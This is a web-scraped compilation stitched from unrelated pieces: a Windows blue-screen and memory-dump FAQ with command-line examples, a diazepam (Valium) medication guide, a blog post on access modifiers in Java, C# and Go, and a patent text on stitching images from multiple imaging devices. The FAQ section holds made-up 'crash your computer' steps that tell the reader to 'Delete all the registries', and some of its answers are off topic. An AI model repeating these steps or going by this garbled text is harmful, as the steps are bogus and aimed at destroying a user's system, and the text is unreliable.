• Step 6: Input the Symbols File Path.
• Step 7: Save the Workspace.
• Step 8: Open the Crash Dump.

What causes memory management blue screen?

Damaged or removed system files after you've installed software or drivers related to the Windows operating system. Error 0x1A blue screen caused by a damaged hard disk. MEMORY_MANAGEMENT STOP error due to memory (RAM) corruption.

Is Blue Screen of Death fixable?

A Blue Screen of Death (BSOD), also called a STOP error, will appear when an issue is so serious that Windows must stop completely. A Blue Screen of Death is usually hardware or driver related. Most BSODs show a STOP code that can be used to help figure out the root cause of the Blue Screen of Death.

Does Blue Screen of Death delete files?

If you have a blue screen of death error on your PC, relax! 4 effective solutions are available here to help you fix the BSOD issue on Windows without losing any files. Your computer cannot boot and presents you with a blue screen of death after a system update.

Why use blue screen instead of green?

Using green instead of blue results in less noise when keying out the footage. Color spill: depending on your shoot, color spill can be better or worse depending on the color of your screen.
Blue screen tends to have less spill than green, and also happens to be easier to color correct than green.

How do I change blue screen?

Use a green-screen or blue-screen effect:
1. In the timeline, select a clip or range that you shot against a green or blue backdrop, and drag it above a clip in your project.
2. If the video overlay controls aren't shown, click the Video Overlay Settings button.
3. Click the pop-up menu on the left and choose Green/Blue Screen.

How do I crash my computer windows 7?

Method 1:
• Step 1: Go to the Start Menu.
• Step 2: Click on Run.
• Step 3: Type "Regedit" in the run dialog box.
• Step 4: Click OK.
• Step 5: Under the "My computer" option you will find the following folders:
• Step 6: Open all the above-mentioned folders.
• Step 7: Click on "Delete all the registries".

How do you get a blue screen on Windows?

How to force a Blue Screen of Death error:
1. Use the Windows key + R keyboard shortcut to open the Run command.
2. Type regedit, and click OK to open the registry.
3. Browse the following path:
4. Right-click on the right side, select New, and then click on DWORD (32-bit) Value.
5. Name the new DWORD CrashOnCtrlScroll and press Enter.

Can I delete crash dump files?

Because of their large size, memory dump files can take up a lot of hard drive space. You can delete memory dumps to free up space on your hard disk. This task can be accomplished by using the Disk Cleanup utility.

What are system error memory dump files in Windows 7?

Windows saves all these memory dumps in the form of System Error Memory Dump files on your local disk C. The Disk Cleanup utility can be used to delete these files and make the storage usable. However, many users reported that the Disk Cleanup utility failed to delete the required files.

Where is the memory dump file in Windows 7?

The default location of the dump file is %SystemRoot%\memory.dmp, i.e. C:\Windows\memory.dmp if C: is the system drive. Windows can also capture small memory dumps which occupy less space. These dumps are created in %SystemRoot%\Minidump (C:\Windows\Minidump if C: is the system drive).

Photo in the article by "Wikimedia Commons" https://commons.wikimedia.org/wiki/File:Blue_screen_in_ko.jpg
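As a command-line footnote to the GUI procedures above: the same tasks can be scripted. This is only a sketch assuming an elevated Command Prompt on Windows 7; the article itself does not give the registry path, so the one shown (the documented path for USB keyboards) should be treated as an assumption here.

    :: Check the system drive for file system errors (/F) and bad sectors (/R),
    :: the command-line equivalent of the Error-checking steps above.
    chkdsk C: /F /R

    :: Enable the Right Ctrl + Scroll Lock (twice) crash trigger. kbdhid is the
    :: driver for USB keyboards; PS/2 keyboards use i8042prt instead (assumption).
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\kbdhid\Parameters" /v CrashOnCtrlScroll /t REG_DWORD /d 1 /f

    :: Open the full memory dump in WinDbg and run an automatic analysis.
    windbg -z %SystemRoot%\MEMORY.DMP -c "!analyze -v"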
diazepam anxiety meds

What is Valium?

Valium (diazepam) is a benzodiazepine. Diazepam is thought to work by enhancing the activity of certain neurotransmitters in the brain. Valium is used to treat anxiety disorders or alcohol withdrawal symptoms. Valium is sometimes used together with other medications to treat muscle spasms and stiffness, or seizures.

Precautions:

You should not use Valium if you are allergic to diazepam or similar drugs (Ativan, Klonopin, Xanax, and others), or if you have myasthenia gravis, severe liver disease, narrow-angle glaucoma, a serious breathing problem, or sleep apnea. Diazepam can slow or stop your breathing, especially if you have recently used an opioid medication or alcohol. Keep the medicine away from other people, especially children. Do not stop using this medicine without asking your doctor. You may have dangerous withdrawal symptoms if you stop using the drug suddenly after long-term use. Some withdrawal symptoms may last as long as a year or longer. Get medical help right away if you stop using Valium and have symptoms such as unusual muscle movements, being more active or talkative, sudden and severe changes in mood or behavior, confusion, hallucinations, seizures, or thoughts about suicide.

Things to know before you take this:

Some people have thoughts about suicide while taking Valium. Stay alert to changes in your mood or symptoms. Your family or caregivers should also watch for sudden changes in your behavior while you take this medication. Valium may harm an unborn baby. Do not use it if you are pregnant or may become pregnant. If you use Valium during pregnancy, your baby could be born with dangerous withdrawal symptoms and may need medical treatment for several weeks. Do not start or stop seizure medication during pregnancy without your doctor's advice. Diazepam may harm an unborn baby, but having a seizure during pregnancy could harm both mother and baby, and preventing seizures may outweigh these risks. Tell your doctor right away if you become pregnant. There may be other seizure medications that are safer to use during pregnancy. You should not breastfeed.

How should I take Valium?

Take Valium exactly as prescribed by your doctor. Follow the directions on your prescription label and read all medication guides or instruction sheets. Never use Valium in larger amounts, or for longer than prescribed. Tell your doctor if you feel an increased urge to use more of this medicine. Never share this medicine with another person, especially someone with a history of drug abuse. Keep the medication where others cannot get to it. Selling or giving away this medicine is against the law. Measure liquid medicine with the supplied measuring device (not a kitchen spoon). Valium should be used for only a short time. Do not take this medicine for longer than 4 months without your doctor's advice. Do not stop using Valium without asking your doctor. You may have increased seizures or dangerous withdrawal symptoms if you stop using the drug suddenly after long-term use.

What should I avoid while taking Valium?
Do not drink alcohol. Dangerous side effects or death could occur. Grapefruit may interact with diazepam and lead to unwanted side effects. Avoid products made from grapefruit. Avoid driving or hazardous activity until you know how this medication will affect you.
Object Oriented Programming: Curiosity of access modifiers

❝Access modifiers that are typically available to programming languages.❞

In object oriented programming languages there are a number of different access levels available. These access levels can be applied to fields and methods. Access levels are there to ensure the features of an object are called only by those parts of the logic that are allowed to access them. They enforce encapsulation, the separation of implementation logic from usage logic. In a class hierarchy-based OOP language there are typically 4 levels of access modifiers: private, package-private, protected and public.

Access modifiers in practice

Now if we look at this from the perspective of implementation and usage logic, we find that there is something curious going on. private, package-private and public all define an access level that is relevant to the usage of such an object: private features are restricted from being used by anything but implementation logic, package-private features can be used only if the logic resides within the same package, and public can be used by any (usage) logic. Similarly, there is a scale that can be explained for implementation logic. private can be accessed only by features within the same class, protected can be accessed only by features within the same class hierarchy (i.e. derived from this class, thus extending on its internal state) and implementation logic, and public features are open to all, including any implementation.

A schematic representation of the access levels:

                        <<usage>> public
                               |
                               |
                 <<usage>> protected <<implementation>>
                      /                   \
                     /                     \
        <<usage>> pkg-private          ??? <<implementation>>
                     \                     /
                      \                   /
                       private <<implementation>>

Note that if you make a feature accessible to the (derived) class hierarchy, i.e. other classes that derive from this class, you are also making it accessible to usage logic within the package. This seems like a curious choice, since implementation logic exists for a different reason than usage logic. The level denoted by ??? is a blind spot. There exists no access modifier that sets the access level to that particular spot in the graph. Effectively, this means that if you open up your implementation methods to classes that derive from your class, then you are implicitly opening up your otherwise hidden (encapsulated) implementation logic (remember, this is internal state management) to usage logic within the package. One can argue that this is not a big issue, as we implement the package ourselves. However, my point is that you unnecessarily expose implementation logic to outside influences, making it available to be called by usage logic, even though it may be intended for implementation logic only. And, as we know, usage logic is not responsible for or interested in preserving internal state consistency. I can only speak for myself, of course, but I have had more cases where the missing access level would be appropriate than I have had cases where the current protected level is appropriate. That is, I have rarely written a method that was required to be accessible for both implementation logic in derived classes and usage logic within the same package.

The right way to use 'protected'

We discussed how Java's protected access modifier is not as useful as expected. We also saw that accessing a method in order to use it is a distinct concern from accessing it in order to inherit from an object and extend it with new implementation logic.
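To make the blind spot concrete, here is a minimal Java sketch; all class names are invented for illustration:

    // All three classes live in the same package, e.g. "demo".
    class Base {
        // Intended only for implementation logic in subclasses.
        protected void rebuildInternalState() { /* manage internal state */ }
    }

    class Derived extends Base {
        void refresh() {
            rebuildInternalState(); // implementation access: as intended
        }
    }

    class UnrelatedUser {
        void poke(Base b) {
            // Pure usage logic, yet this compiles: in Java, protected
            // also implies package access, so the "???" level is missing.
            b.rebuildInternalState();
        }
    }

In C#, as discussed below, the call in UnrelatedUser would not compile, because protected there limits access to derived types.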
The right way to use ‘protected’

We discussed how Java’s protected access modifier is not as useful as expected. We have also seen that accessing a method for the purpose of using it is a different concern from accessing an object in order to inherit from it and extend it with new implementation logic. Considering these distinct goals, only one of the two should be targeted when a method is implemented. Given the above caveat, it is best to use the package-private access modifier to grant package-level usage access (this is actually in line with its intended use) and to grant inheritance-level implementation (privileged) access with the protected access modifier. The latter, protected, grants wider access than described here, but for the purpose of control and manageability we should refrain from leveraging the protected access level for usage logic. A sketch of this convention follows at the end of this post.

C#’s access modifiers

It turns out that C# defines its access modifiers differently, making them more suitable for the goals described above; see Accessibility Levels (C# Reference). There, protected really does mean that only access from derived classes is allowed. It correctly separates the usage levels from the implementation levels. Quote from the ‘protected’ access level description:

    protected: Access is limited to the containing class or types derived from the containing class.

Access modifiers in Go

To give you an impression of how you could otherwise arrange access levels in a programming language, we’ll look at the access levels in Go. Go has a very limited set of access modifiers … actually, it does not have any access modifiers, but it does have access levels. There are 2 variations: unexported and exported. The unexported level exists to limit accessibility to logic in the same package. Exported access does not impose this limit and makes these features freely accessible from the outside. Go manages these access levels through the capitalization of the first letter of a name: if the first letter is a capital, the feature is exported; if it is not, the feature is limited to use inside the package.

Note that there is no further access level for making a feature private to only a single type, such that even other logic inside the package cannot access it. In Go, inside a package you can access everything. Within the same package, there is no real way to prevent logic that merely uses an object from accessing certain features. There is, however, the option to use an interface definition to restrict the set of methods that are exposed: as the specific type is not known to the caller, only the methods of the interface are available.

As a side note

Technically one could argue that public is a valid implementation access level too. This would qualify if you consider global state, such as static variables spread over multiple classes, as state that should be managed. Since global state is not exactly best practice in object oriented programming, I do not take it into account here.
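Returning to the recommendation above, here is a minimal Java sketch of the convention (names hypothetical): package-private methods carry the usage API inside the package, while protected methods are reserved, by convention, for implementation hooks in subclasses.

    package store;

    public abstract class Repository {

        // Usage access for collaborators in the same package: package-private.
        void save(String record) {
            validate(record);
            write(record);
        }

        // Implementation hooks for subclasses only. By convention we never
        // call these from usage logic, even though Java's protected level
        // would allow package access as well.
        protected void validate(String record) {
            if (record == null || record.isEmpty()) {
                throw new IllegalArgumentException("empty record");
            }
        }

        protected abstract void write(String record);
    }

Note that this convention is not compiler-enforced in Java; it merely documents which of the two concerns a method serves.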
Image processing apparatus
Patent Number: 6744931
Inventor: Komiya, et al.
Date Issued: June 1, 2004
Application: 09/740,492
Filed: December 19, 2000
Inventors: Ebihara; Toshiyuki (Hino, JP), Iba; Yoichi (Hachioji, JP), Komiya; Yasuhiro (Hino, JP), Mori; Takeshi (Machida, JP), Nagasaki; Tatsuo (Yokohama, JP), Oura; Koutatsu (Chofu, JP), Sawaki; Ryoichi (Hachioji, JP), Tomabechi; Hideo (Higashiyamato, JP)
Assignee: Olympus Optical Co., Ltd. (Tokyo, JP)
Primary Examiner: Chang; Jon
Attorney Or Agent: Frishauf, Holtz, Goodman & Chick, P.C.
U.S. Class: 345/629; 382/284; 382/294
Field Of Search: 382/284; 382/294; 345/629; 345/630; 348/36; 348/37; 352/69; 352/70; 352/71; 396/20
U.S. Patent Documents: 3905045; 4220967; 4754492; 4876732; 4951136; 4992781; 4994914; 5022085; 5054100; 5140647; 5187754; 5274453; 5315390; 5321798; 5469274; 5566251; 5686960
Foreign Patent Documents: 57-131188; 62-195984; 62-247692; 64-34073; 01-251962; 2-178646; 3-108962; 4-269793; 4-347979; 5-30520; 5-328205; 6-178327
Other References: Rumelhart, David E., et al., Parallel Distributed Processing, Vol. 1, Chapter 8, pp. 319-362, The MIT Press, Cambridge, Massachusetts, 1986.

Abstract: Disclosed herein is an image processing apparatus, in which an object image focused by a lens is split into a plurality of images by means of a light splitting section. These images are converted into image data items by a plurality of imaging devices which are arranged with their imaging areas overlapping in part. The image data items are stored temporarily in an image storing section. A displacement detecting section detects displacement coefficients (rotation angle R and parallel displacement S) from the image signals representing the mutual overlap region of two images which are to be combined and which are represented by two image data items read from the image storing section. The position of any specified pixel of the image displayed is identified by the pixel signal generated by the corresponding pixel of any imaging device. An interpolation section performs interpolation on the pixel values of the imaging device, thereby correcting the values of the other pixels of the image displayed and ultimately generating interpolated image signals. The interpolated image signals are combined with the image signals produced by the imaging device, whereby a display section displays a high-resolution image.

Claim: What is claimed is:
1. An image processing apparatus for combining a plurality of image areas which are obtained as image data by dividing an object image, comprising: imaging means for imaging an object within each of a plurality of image areas having at least one overlap area; and image area position detecting means for detecting a positional relationship relating to overlapping between the plurality of image areas within which the object is imaged by said imaging means by calculating correlation between the plurality of image areas; wherein said imaging means includes: optical image picking-up means for picking up an image of the object; light splitting means for splitting an object light received by said optical image picking-up means into a plurality of object lights; a plurality of groups of imaging elements for obtaining images from the plurality of object lights obtained by said light splitting means, and said image area position detecting means includes: displacement determining means for setting a reference area in the image obtained by one of the groups of imaging elements of said imaging means, setting a search area in a position corresponding to the reference area in the image obtained by another one of the groups of imaging elements, and then calculating a displacement between said one of the groups of imaging elements and said another one of the groups of imaging elements by performing a correlation arithmetic with respect to the reference area and the search area, to thereby determine a coefficient for use in interpolation; storing means for storing the coefficient determined by said displacement determining means; interpolation means for calculating an image signal associated with a position of said another one of the groups of imaging elements which corresponds to a position of said one of the groups of imaging elements, by using an interpolation arithmetic, in accordance with a value indicated by data stored in said storing means; and image data synthesizing means for combining a plurality of image data output from said imaging means and said interpolation means.

2. The image processing apparatus according to claim 1, which further comprises (i) first image storing means for storing an object obtained as image data by said imaging means, and (ii) second image storing means for storing a reference image as reference image data in advance, and wherein the image area position detecting means comprises (i) movement vector detecting means for calculating a correlation between the images read out as image data from said first and second storing means, and comparing the images, to thereby detect a movement vector, and (ii) third image storing means for storing the image as the image data which is moved from said first image storing means based on the movement vector detected by said movement vector detecting means.

3. The image processing apparatus according to claim 2, wherein the movement detecting means includes a correlation area selecting means for selecting an area having a high correlation.

4. The image processing apparatus according to claim 1, which further comprises a mirror rotatably provided between the object and said imaging means, and wherein when said imaging means images the object, object images are intermittently obtained as image data, and said mirror is rotated to shift an imaging range over the object, while obtaining the object images.
5. An image processing apparatus for combining a plurality of image areas which are obtained as image data by dividing an object image, comprising: imaging means for imaging an object within each of a plurality of image areas having at least one overlap area; image area position detecting means for detecting a positional relationship relating to overlapping between the plurality of image areas within which the object is imaged by said imaging means by calculating correlation between the plurality of image areas; a finder for displaying in real time an image being obtained by said imaging means, along with that overlap area of an image previously obtained by said imaging means, which is to be made to overlap with the image being obtained by said imaging means when the image being obtained by said imaging means is connected to the image previously obtained by said imaging means; correlation arithmetic means for performing a correlation arithmetic with respect to an image signal associated with the overlap area of the previously obtained image and a present image signal representing a present image obtained subsequent to the previously obtained image, to thereby determine a displacement between the previously obtained image and the present image; and indicating means for indicating a direction in which said imaging means is to be moved to obtain an image signal that coincides with the image signal associated with the overlap area of the previously obtained image based on the displacement determined by said correlation arithmetic means.

6. The image processing apparatus according to claim 5, wherein said indicating means displays an arrow indicator in the finder to indicate the direction in which the imaging means is to be moved.

7. The image processing apparatus according to claim 5, wherein said indicating means changes the color of the arrow indicator displayed in the finder when the present image signal representing the present image obtained subsequent to the previously obtained image coincides with the image signal associated with the overlap area of the previously obtained image.

Description: BACKGROUND OF THE INVENTION

1. Field of the Invention

The present invention relates to an image processing apparatus for forming either images of the parts of an object or images of an object which are identical but different in color, and for combining the images into a wide high-resolution image of the object.

2. Description of the Related Art

Image processing apparatuses using a solid-state imaging device such as a CCD are generally used in electronic still cameras, video cameras, and the like. It is demanded that an image processing apparatus have a higher resolution, particularly so high a resolution that the apparatus may provide a wide image of an object. Also it is desired that the image processing apparatus have so high a resolution that it can form an image as wide as a panoramic image.

Two techniques are available for increasing the resolution of the image processing apparatus. The first technique is to use a solid-state imaging device with a sufficiently high resolution. The second technique is to use a plurality of solid-state imaging devices for obtaining images of parts of an object, respectively, and to combine the images into a single high-resolution image of the entire object. More precisely, the first resolution-increasing technique is to use more pixels per unit area of the device chip.
In other words, smaller pixels are arranged in a greater number in the unit area, thus increasing the pixel density of the imaging device. The second resolution-increasing technique is classified into two types. The first-type technique comprises the first step of controlling the optical system incorporated in an image processing apparatus, thereby switching the view field of the apparatus from one part of an object to another part and thus enabling the imaging devices to produce images of parts of an object, and the second step of combining the images, thus produced, into a high-resolution image of the entire object. The second-type technique comprises the first step of dividing an optical image 600 of an object into, for example, four parts by means of prisms as shown in FIG. 1, the second step of applying the parts of the optical image to four imaging devices 611, 621, 631, and 641, respectively, and the third step of combining the image data items output by the devices, thereby forming a single image of the object. In the second-type technique, the imaging devices 611 to 641 are so positioned as to cover the predetermined parts of the object as illustrated in FIG. 2.

There is known another resolution-increasing technique similar to the second-type technique described in the preceding paragraph. This technique uses a detector 611 having four imaging devices 612 which are arranged in the same plane in a 2×2 matrix, spaced apart from one another for a predetermined distance as is shown in FIGS. 3A to 3C. The view-field image 613 of an object (i.e., a broken-line square) is intermittently moved with respect to the imaging-device matrix by driving an optical system, in the sequence indicated by FIGS. 3A, 3B, 3C, and 3D. The optical image of an object need not be divided by prisms or similar means, unlike in the second-type technique.

The conventional resolution-increasing techniques, described above, are disadvantageous in the following respects.

The first technique can increase the resolution but to a limited degree, for two reasons. First, the number of pixels the existing manufacturing technology can form in the unit area of the device chip is limited. Second, the smaller a pixel, the less sensitive it is. A larger device chip may indeed be used to form more pixels on the chip. With the conventional manufacturing method, however, the ratio of defective pixels to good ones will increase if many pixels are formed on a large chip. Consequently, solid-state imaging devices having a large image-receiving surface can hardly be manufactured with a sufficiently high yield.

In the second resolution-increasing technique, the image data items output from the imaging devices (e.g., four devices) are combined to produce a single image. To render the reproduced image substantially identical to the original image of the object, the images of the object parts should neither be spaced apart nor overlap one another. The images will be spaced apart or overlap unless the pixels arranged along that edge of one device which abuts on the edge of the next device are spaced by exactly the one-pixel distance from the pixels arranged along that edge of the next device. The imaging devices therefore need to be positioned with very high precision during the manufacture of the image processing apparatus. It takes much time to position the devices so precisely, inevitably reducing the manufacturing efficiency and, ultimately, raising the cost of the image processing apparatus.
Also in the resolution-increasing technique similar to the second-type technique, the imaging devices must be positioned with high precision. In addition, the optical system must be driven with high precision in order to intermittently move the view-field image of an object (i.e., a broken-line square) with respect to the imaging-device matrix. A high-precision drive is indispensable to the image processing apparatus. The use of the drive not only makes it difficult to miniaturize or lighten the apparatus, but also raises the manufacturing cost of the apparatus.

A color image processing apparatus is known, a typical example of which is a so-called "three-section color camera." This color camera comprises a color-component generating system and three imaging devices. The color-component generating system decomposes an input optical image of an object into a red image, a green image, and a blue image. The three imaging devices convert the red image, the green image, and the blue image into red signals, green signals, and blue signals, all being television signals of the NTSC system or the like. The signals output from the three imaging devices are combined, whereby the red, green, and blue images are combined, forming a single color image of the object. A color image with no color distortion cannot be formed unless the imaging devices are positioned or registered with high precision.

Images of parts of an object are combined, also in an image processing apparatus which has a plurality of optical imaging devices for photographing the parts of the object on photographic film, thereby forming a panoramic image of the object. To form a high-quality panoramic image, the images of the object parts should neither be spaced apart nor overlap one another. Hence, the optical system incorporated in this image processing apparatus must be controlled with high precision. Consequently, the apparatus requires a complex device for controlling the optical system, and cannot be manufactured at low cost.

SUMMARY OF THE INVENTION

Accordingly, it is the object of this invention to provide an image processing apparatus which forms either images of the parts of an object or images of an object which are identical but different in color, and which combines the images into a wide high-resolution image of the object.

In a first aspect of the invention, there is provided an image processing apparatus for combining a plurality of images into a single large image such that the images have overlap regions, comprising: image storing means for storing image data items representing the images; interpolation means for detecting a positional relation between a reference pixel and a given pixel in the overlap area of each image from image data read from the image storing means and representing the overlap area, and for interpolating the image data item read from the image storing means and representing the image, in accordance with a displacement coefficient indicating the positional relation, thereby to generate interpolated image data; and image-synthesizing means for combining the interpolated image data items generated by the interpolation means, thereby to form a single large image.
In a second aspect of the invention, there is provided an image processing apparatus for combining a plurality of images into a single large image such that the images have overlap regions, comprising: light splitting means for splitting an object image; a plurality of imaging devices arranged such that an imaging area of each overlaps that of another; image storing means for storing image data items generated by the imaging devices and representing images overlapping one another and overlap regions of the images; displacement detecting means for detecting displacement (i.e., a displacement coefficient consisting of a rotation angle R and a parallel displacement S) representing a relation between a reference pixel and a given pixel in the overlap area of each image from the image data item read from the image storing means and representing the overlap area; interpolation means for interpolating the image data items read from the image storing means, in accordance with the rotation angle R and the parallel displacement S detected by the displacement detecting means, thereby to generate interpolated image data items; and image-synthesizing means for combining the interpolated image data items generated by the interpolation means, thereby to form a single large image.

In a third aspect of the invention, there is provided an image processing apparatus for combining a plurality of images into a single large image such that the images have overlap regions, comprising: imaging means for intermittently scanning parts of an object image, thereby generating a plurality of image data items; image storing means for sequentially storing the image data items generated by the imaging means; reference image storing means storing an image data item representing a reference image; motion vector detecting means for comparing each image data item read from the image storing means with the image data item read from the reference image storing means, thereby detecting correlation between the reference image and the image represented by the image data item read from the image storing means and detecting a motion vector; and image-synthesizing means for processing the image data items stored in the image storing means, in accordance with the motion vectors detected by the motion vector detecting means, thereby combining the image data items.

In a fourth aspect of this invention, there is provided an image processing apparatus for combining a plurality of images into a single large image such that the images have overlap regions, comprising: image storing means for storing image data items; a plurality of display means for displaying images represented by the image data items read from the image storing means; interpolation means for interpolating the image data items in accordance with displacement coefficients for the display means, thereby generating interpolated image data items representing images which are to be displayed by the display means, adjoining one another without displacement; and image-synthesizing and displaying means for combining the image data items stored in the image storing means and for displaying the images represented by the image data items and adjoining one another without displacement.

Additional objects and advantages of the invention will be set forth in the description which follows, and in part will be obvious from the description, or may be learned by practice of the invention.
The objects and advantages of the invention may be realized and obtained by means of the instrumentalities and combinations particularly pointed out in the appended claims.

BRIEF DESCRIPTION OF THE DRAWINGS

The accompanying drawings, which are incorporated in and constitute a part of the specification, illustrate presently preferred embodiments of the invention, and together with the general description given above and the detailed description of the preferred embodiments given below, serve to explain the principles of the invention.

FIG. 1 is a diagram showing the positional relation of the optical system and the imaging devices--all incorporated in a conventional image processing apparatus;
FIG. 2 is a diagram showing the specific positions the imaging devices assume in a conventional image processing apparatus, in order to cover the predetermined parts of the object;
FIGS. 3A to 3D are diagrams explaining how a view-field image of an object is intermittently moved with respect to four imaging devices in a conventional image processing apparatus;
FIGS. 4A and 4B are a block diagram and a diagram, respectively, showing the basic structure and operation of an image processing apparatus according to the invention;
FIG. 5A is a diagram showing the imaging areas of the two CMDs incorporated in the apparatus shown in FIG. 4A, and FIG. 5B is a diagram showing the positional relation which each screen pixel has with the nearest four CMD pixels;
FIG. 6 is a block diagram showing an image processing apparatus according to a first embodiment of the present invention;
FIG. 7 is also a block diagram showing the displacement-detecting circuit and the interpolation circuit, both incorporated in the apparatus shown in FIG. 6;
FIG. 8 is a diagram illustrating the imaging areas of the CMDs used in the apparatus of FIG. 6, which overlap each other in part;
FIG. 9 is a diagram representing two displacement vectors resulting from the rotation and parallel movement of one CMD imaging area with respect to the other CMD imaging area, respectively;
FIG. 10 is a diagram explaining how the displacement-detecting circuit shown in FIG. 7 executes correlation;
FIG. 11 is a diagram illustrating the positional relation a specified screen pixel has with four CMD pixels located around the screen pixel;
FIG. 12 is a diagram showing the position of each pixel in the CMD 8 and that of the corresponding pixel of the CMD 9, in terms of vectors;
FIG. 13 is a block diagram which shows the displacement-detecting circuit and the interpolation circuit, both incorporated in an image processing apparatus according to a second embodiment of the present invention;
FIGS. 14A and 14B are diagrams showing the light-splitting section of an image processing apparatus according to a third embodiment of this invention;
FIG. 15 is a diagram representing the light distributions in the imaging areas of the CMDs 8 and 9 used in the third embodiment;
FIG. 16 is a diagram illustrating the light distributions which have been obtained by applying an inverse function to different light distributions;
FIG. 17 is a block diagram showing the image processing apparatus according to the third embodiment of the invention;
FIG. 18 is a block diagram showing an image processing apparatus according to a fourth embodiment of the present invention;
FIGS. 19A, 19B, and 19C are diagrams explaining how an input light flux may be applied through separator lenses in various manners, in the apparatus shown in FIG. 18;
FIG. 20 is a block diagram showing an image processing apparatus according to a fifth embodiment of the present invention;
FIG. 21 is a diagram showing the imaging areas of the two CMDs incorporated in the apparatus shown in FIG. 20;
FIG. 22A is a block diagram showing an image processing apparatus according to a sixth embodiment of this invention;
FIG. 22B is a diagram explaining how the CMDs are arranged in the apparatus of FIG. 22A;
FIGS. 23A to 23D are perspective views of four alternative light-splitting sections for use in an image processing apparatus according to a seventh embodiment of the present invention;
FIGS. 24A and 24B are a side view and a top view, respectively, of the light-splitting section shown in FIG. 23A;
FIGS. 25A and 25B are a side view and a top view, respectively, of the light-splitting section shown in FIG. 23B;
FIG. 26 is a diagram representing the imaging areas of the CMDs used in the seventh embodiment, and also the display area of the display section incorporated in the seventh embodiment;
FIG. 27 is a perspective view showing an image processing apparatus according to an eighth embodiment of the present invention;
FIGS. 28 and 29 are a plan view and a sectional view, respectively, explaining the first method of positioning CMDs;
FIG. 30 is a side view of a CMD ceramic package having protruding metal terminals;
FIG. 31 is a side view of a CMD ceramic package comprising a substrate and spacers mounted on both edges of the substrate;
FIG. 32 is a plan view, explaining a method of positioning bare CMD chips on a ceramic substrate;
FIGS. 33A to 33C are views explaining a method of positioning CMDs which is employed in the sixth embodiment of the invention;
FIG. 34 is a side view, also explaining another method of positioning bare CMD chips on a ceramic substrate;
FIG. 35A is a block diagram showing an image processing apparatus according to a ninth embodiment of the present invention;
FIG. 35B corresponds to FIG. 35A, but with the image-synthesizing circuit being simplified to comprise an adder;
FIG. 36 is a block diagram illustrating an image-synthesizing circuit incorporated in the ninth embodiment;
FIG. 37 is a diagram explaining the linear interpolation the image-synthesizing circuit performs;
FIG. 38 is a block diagram showing an image-synthesizing circuit which may be used in the ninth embodiment;
FIG. 39 is a diagram explaining the linear interpolation which the circuit shown in FIG. 38 performs;
FIG. 40 is a block diagram showing an image processing apparatus according to a tenth embodiment of the present invention;
FIG. 41 is a block diagram showing a modification of the apparatus shown in FIG. 40;
FIGS. 42A, 42B, and 42C are diagrams showing various operators which are used as weighting coefficients in the apparatus shown in FIG. 40;
FIG. 42D is a block diagram showing an edge-emphasizing circuit of FIG. 40;
FIGS. 43 and 44 are block diagrams showing an image processing apparatus according to an eleventh embodiment of this invention;
FIGS. 45A, 45B, and 45C are diagrams showing three alternative reference patterns which are alternatively used in the eleventh embodiment;
FIGS. 46A and 46B are diagrams showing two types of reference pattern filters which are alternatively incorporated in an image processing apparatus according to a twelfth embodiment of the invention;
FIG. 47 is a block diagram showing the apparatus which is the twelfth embodiment of this invention;
FIGS. 48A and 48B are diagrams explaining how a synthesized image is rotated with respect to another image before being combined with the other image;
FIG. 49 is a block diagram showing an image processing apparatus according to a thirteenth embodiment of the invention, in which a synthesized image is rotated as shown in FIGS. 48A and 48B;
FIGS. 50A and 50B are diagrams explaining how to eliminate an undesirable portion from the adjoining area of a synthesized image, in the process of combining three or more images into a single image;
FIG. 51 is a block diagram illustrating an image processing apparatus according to a fourteenth embodiment of the invention, in which an undesirable portion is eliminated from the adjoining area of a synthesized image as is shown in FIGS. 50A and 50B;
FIG. 52 is a block diagram showing a first-type synthesis section incorporated in an image processing apparatus according to a fifteenth embodiment of the invention;
FIG. 53 is a diagram showing the apparatus which is the fifteenth embodiment of the present invention;
FIG. 54 is a block diagram showing one of the identical second-type synthesis sections used in the apparatus shown in FIG. 53;
FIG. 55 is a diagram showing an image processing apparatus according to a sixteenth embodiment of the present invention;
FIG. 56 is a block diagram showing one of the identical third-type synthesis sections used in the sixteenth embodiment;
FIG. 57 is a side view of a projector which is a seventeenth embodiment of the invention;
FIG. 58 is a block diagram of the imaging section of the projector shown in FIG. 57;
FIG. 59 is a perspective view showing the half prism and the components associated therewith--all incorporated in the projector;
FIG. 60 is a block diagram showing the system incorporated in the projector, for detecting the displacements of the LCDs used in the projector;
FIG. 61 is a block diagram showing another system which may be used in the projector, to detect the displacement of the LCDs;
FIG. 62 shows a CRT monitor according to the present invention;
FIG. 63 is a block diagram of a film-editing apparatus which is an eighteenth embodiment of this invention;
FIGS. 64A to 64E are diagrams showing various positions the line sensors may assume in the apparatus shown in FIG. 63, and showing the condition of an image formed;
FIGS. 65A and 65B are block diagrams showing, in detail, an image processing apparatus according to a nineteenth embodiment of the invention;
FIG. 66 is a block diagram illustrating an image processing apparatus which is a twentieth embodiment of the present invention;
FIG. 67 is a block diagram showing an electronic camera which is a twenty-first embodiment of this invention;
FIG. 68 is a block diagram showing the shake-correcting circuit incorporated in the electronic camera of FIG. 67;
FIGS. 69A to 69D are diagrams explaining how the imaging area of the camera (FIG. 67) moves, without shaking, with respect to the image of an object;
FIGS. 70A to 70D are diagrams illustrating how the imaging area of the camera moves, while shaking, with respect to the image of an object;
FIG. 71 is a diagram explaining the method of finding the correlation between a reference image and an object image by moving the object image with respect to the reference image;
FIGS. 72A and 72B are diagrams explaining how to determine the distance and angle by which an image has moved and rotated;
FIG. 73 is a diagram showing how an image is moved;
FIGS. 74A and 74B are perspective views of the electronic camera (FIG. 67) and a recording section, explaining how to operate the camera in order to form an image of an object and record the image;
FIG. 75 is a diagram showing the imaging section of an electronic camera which is a twenty-second embodiment of the invention;
FIGS. 76A and 76B are diagrams explaining the technique which is employed in a twenty-third embodiment of the invention in order to calculate the correlation between images with high accuracy;
FIG. 77 is a block diagram showing a shake-correcting circuit for use in a twenty-fourth embodiment of the invention;
FIG. 78 is a block diagram showing the correlated area selector incorporated in the circuit illustrated in FIG. 77;
FIG. 79 is a diagram showing images one of which may be selected by the image-selecting circuit incorporated in the correlated area selector shown in FIG. 78;
FIGS. 80A, 80B, and 80C show three sets of coefficients for a convolution filter;
FIG. 81 is a circuit for obtaining the absolute sum of the value differences among adjacent pixels;
FIG. 82 is a side view showing the imaging section of an electronic camera;
FIG. 83 is a side view illustrating another type of an imaging section for use in the electronic camera;
FIG. 84 is a cross-sectional side view of the imaging section of an electronic camera which is a twenty-fifth embodiment of the invention;
FIG. 85 is a circuit diagram showing the CMD incorporated in the imaging section of FIG. 84;
